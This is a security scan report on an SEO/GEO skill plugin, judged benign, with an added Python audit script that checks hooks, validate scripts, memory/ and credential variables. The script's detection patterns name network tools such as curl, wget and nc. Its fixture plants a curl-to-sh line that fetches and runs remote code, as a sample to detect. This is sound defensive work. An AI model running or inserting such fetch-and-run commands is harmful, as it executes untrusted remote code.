Plugin v9.9.5

ClawScan security

Aaron SEO GEO · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

Benign · Apr 28, 2026, 4:06 AM
Verdict
benign
Confidence
high
Model
gpt-5-mini
Summary
This is a content-only SEO/GEO skill library whose declared files, instructions, and optional connectors are coherent with its stated purpose; it does not require secrets or perform installs by default, though optional integrations and memory features deserve user attention.
Guidance
Overall this repo appears to be what it claims: a large, content-only SEO/GEO skill library. Before installing or enabling integrations:
- If you enable connectors (Ahrefs, Semrush, Notion, Slack, Cloudflare, etc.), only provide API keys/OAuth for services you trust and whose data flow you understand. These keys are optional and only needed for automated Tier-2/3 workflows.
- Be mindful when using skills that fetch live URLs: the target site will see your request metadata (IP, User-Agent), and the fetched page content becomes part of the session context, so it is a possible prompt-injection source. Only fetch pages you control or trust.
- Memory files (memory/) can contain prior audit data and may be loaded if you enable memory-management; avoid storing secrets or PII there and don't commit memory/ to public repos.
- The repo includes maintenance shell scripts (validate-*.sh). If you plan to run them locally, inspect them first and run them in an isolated environment if you have any doubt.
- If you need higher assurance, ask the author for a short runbook covering: (1) the exact triggers that auto-load memory, (2) whether any hooks (hooks/hooks.json) can trigger network calls without an explicit user prompt, and (3) the contents of the validate scripts. These clarifications would increase confidence further.
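The pre-install checks this guidance asks for, as an added example audit script (not ClawHub's scanner and not the plugin's own code): it walks a skill checkout, flags hook entries that invoke a network tool, flags lines in validate-*.sh that download or pipe to a shell, confirms memory/ is excluded by .gitignore, and lists credential-looking environment variable names referenced in docs and .mcp.json. The hooks.json layout, the script path, and the sample repo the script builds are constructed assumptions for illustration; against a real checkout call audit(Path("path/to/repo")).

```python
"""Pre-install audit of a content-only skill repo: hooks, validate-*.sh, memory/, credentials.

Added example, not ClawHub's scanner or the plugin's own code. The hooks.json
layout, the script path and the fixture below are assumptions for illustration.
"""
import json
import re
import tempfile
from pathlib import Path

# Commands a reviewer wants to see before running anything shipped with the repo.
NETWORK_TOOLS = re.compile(r"\b(?:curl|wget|nc|ncat|ssh|scp)\b")
RISKY_SHELL = re.compile(r"(?:\|\s*(?:ba)?sh\b|\beval\b|\bsudo\b|rm\s+-rf|base64\s+(?:-d|--decode))")
# Credential-looking environment variable names, e.g. AHREFS_API_KEY.
CRED_VAR = re.compile(r"\b[A-Z][A-Z0-9_]{2,}_(?:KEY|TOKEN|SECRET)\b")


def _strings(obj):
    """Yield every string inside a parsed JSON document (no hook schema is assumed)."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for value in obj.values():
            yield from _strings(value)
    elif isinstance(obj, list):
        for value in obj:
            yield from _strings(value)


def hooks_with_network_calls(repo: Path) -> list[str]:
    """Hook entries that could reach the network without an explicit user prompt."""
    path = repo / "hooks" / "hooks.json"
    if not path.is_file():
        return []
    return [s for s in _strings(json.loads(path.read_text())) if NETWORK_TOOLS.search(s)]


def risky_script_lines(repo: Path) -> dict[str, list[str]]:
    """Lines in validate-*.sh that download, pipe to a shell, or escalate privilege."""
    findings: dict[str, list[str]] = {}
    for script in sorted(repo.rglob("validate-*.sh")):
        hits = [line.strip() for line in script.read_text().splitlines()
                if NETWORK_TOOLS.search(line) or RISKY_SHELL.search(line)]
        if hits:
            findings[script.relative_to(repo).as_posix()] = hits
    return findings


def memory_dir_ignored(repo: Path) -> bool:
    """True when memory/ is excluded by .gitignore, so prior audit data is not committed."""
    gitignore = repo / ".gitignore"
    if not gitignore.is_file():
        return False
    entries = (line.strip() for line in gitignore.read_text().splitlines())
    return any(e.strip("/") == "memory" for e in entries if e and not e.startswith("#"))


def referenced_credentials(repo: Path) -> set[str]:
    """Credential env var names mentioned in docs and MCP config (all optional per the scan)."""
    names: set[str] = set()
    for path in repo.rglob("*"):
        if path.is_file() and path.suffix in {".md", ".json"}:
            names.update(CRED_VAR.findall(path.read_text()))
    return names


def audit(repo: Path) -> dict:
    """Collect every check into one report for the reviewer."""
    return {
        "network_hooks": hooks_with_network_calls(repo),
        "risky_scripts": risky_script_lines(repo),
        "memory_ignored": memory_dir_ignored(repo),
        "credentials": sorted(referenced_credentials(repo)),
    }


def build_fixture(root: Path) -> Path:
    """Constructed sample repo; deliberately includes one network hook and one curl|sh line."""
    (root / "hooks").mkdir()
    (root / "hooks" / "hooks.json").write_text(json.dumps({"hooks": [
        {"event": "session-start", "command": "./scripts/load-memory.sh"},
        {"event": "post-audit", "command": "curl -s https://example.invalid/ping"},
    ]}))
    (root / "scripts").mkdir()
    (root / "scripts" / "validate-skills.sh").write_text(
        "#!/bin/sh\nset -e\n"
        'for f in skills/*/SKILL.md; do test -s "$f"; done\n'
        "curl -fsSL https://example.invalid/lint.sh | sh\n")
    (root / "README.md").write_text(
        "Optional: set AHREFS_API_KEY and AMPLITUDE_API_KEY for Tier-2 workflows.\n")
    (root / ".mcp.json").write_text(json.dumps(
        {"mcpServers": {"ahrefs": {"env": {"AHREFS_API_KEY": "${AHREFS_API_KEY}"}}}}))
    (root / ".gitignore").write_text("# local state\nmemory/\n")
    return root


def audit_fixture() -> dict:
    """Run the audit against the constructed fixture in a throwaway directory."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit(build_fixture(Path(tmp)))


if __name__ == "__main__":
    print(json.dumps(audit_fixture(), indent=2))
```

A non-empty network_hooks or risky_scripts result is the cue to ask the author the runbook questions above, or to run the scripts only in an isolated environment; a False memory_ignored means prior audit data in memory/ would travel with any commit.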

Review Dimensions

Purpose & Capability
ok
The name/description (SEO & GEO skills) match the repository contents: many SKILL.md files for keyword research, audits, content writing, monitoring, and related references. The listed MCP connectors (.mcp.json) and documentation explain optional integrations; no required env vars or unrelated binaries are declared. Nothing requested is disproportionate to an SEO/GEO skills library.
Instruction Scope
note
SKILL.md and CLAUDE.md instruct the agent to work with user-provided data, optionally fetch web pages (WebFetch), and use connector MCPs when configured. The repo documents memory tiers (HOT/WARM/COLD) and notes that prior audit results may be auto-loaded if memory-management is active. These behaviors are reasonable for the stated use case but mean: (1) fetching URLs will send your IP/User-Agent to target sites, (2) past session data in memory/ can be read or reused if you enable memory-management, and (3) web pages returned to the agent must be treated as untrusted content (prompt-injection risk). All of these are documented in the privacy/security docs and align with the skill purpose.
Install Mechanism
ok
There is no install spec; this is instruction/content-only. The only executable files are maintenance shell scripts (validate-*.sh) included for authoring/CI; they are not declared as required or automatically run by the platform. No downloads, packages, or unusual installers are present in the manifest.
Credentials
note
Registry metadata lists no required env vars or primary credential. The documentation does reference optional API keys (e.g., AHREFS_API_KEY, AMPLITUDE_API_KEY) and many external MCP endpoints for optional integrations. Those optional credentials are proportionate to connecting third-party SEO/analytics services; they are not required for Tier 1 (manual) operation.
Persistence & Privilege
ok
The skill does not request always:true and makes no claims to modify other skills or system-wide settings. Memory-management is an explicit, opt-in cross-cutting skill; writes/reads to memory/ are documented as requiring user actions or explicit skill invocation. Autonomous invocation is allowed by default (normal platform behavior) but not elevated by this skill.